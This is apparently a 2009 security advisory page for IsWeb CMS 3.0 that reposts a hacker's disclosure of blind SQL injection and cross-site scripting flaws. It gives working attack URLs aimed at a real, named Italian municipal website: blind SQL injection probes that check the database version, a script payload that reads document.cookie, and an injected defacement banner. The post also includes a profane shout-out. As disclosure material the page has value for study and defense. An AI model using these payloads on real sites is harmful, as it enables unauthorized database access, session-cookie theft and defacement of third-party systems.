IsWeb CMS 3.0 (SQL/XSS) Multiple Remote Vulnerabilities

2009.01.23
Credit: XaDoS
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2008-5933 | CVE-2008-5934
CWE: CWE-79

IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities >---------------------------------------< > AuToR: XaDoS (SecurityCode Team) > Contact M&: xados [at] hotmail [dot] it > B§g: Blind $ql inJection > SIte vuln: http://www.cmsisweb.it >---------------------------------------< [&#65533;] BlinD $qL: |: http://www.example.com/index.php?id_sezione=[$qL] > DeM0: |: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No] |: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$] [&#65533;] XSS: |: http://www.comune.avezzano.aq.it/index.php?azione=cerca In this modul (search) write: "><script>alert(document.cookie)</script> or another vuln Page: |: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E [&#65533;] Th4nKs:: \>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</

References:

http://www.securityfocus.com/bid/32823
http://www.milw0rm.com/exploits/7465
http://secunia.com/advisories/33090


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top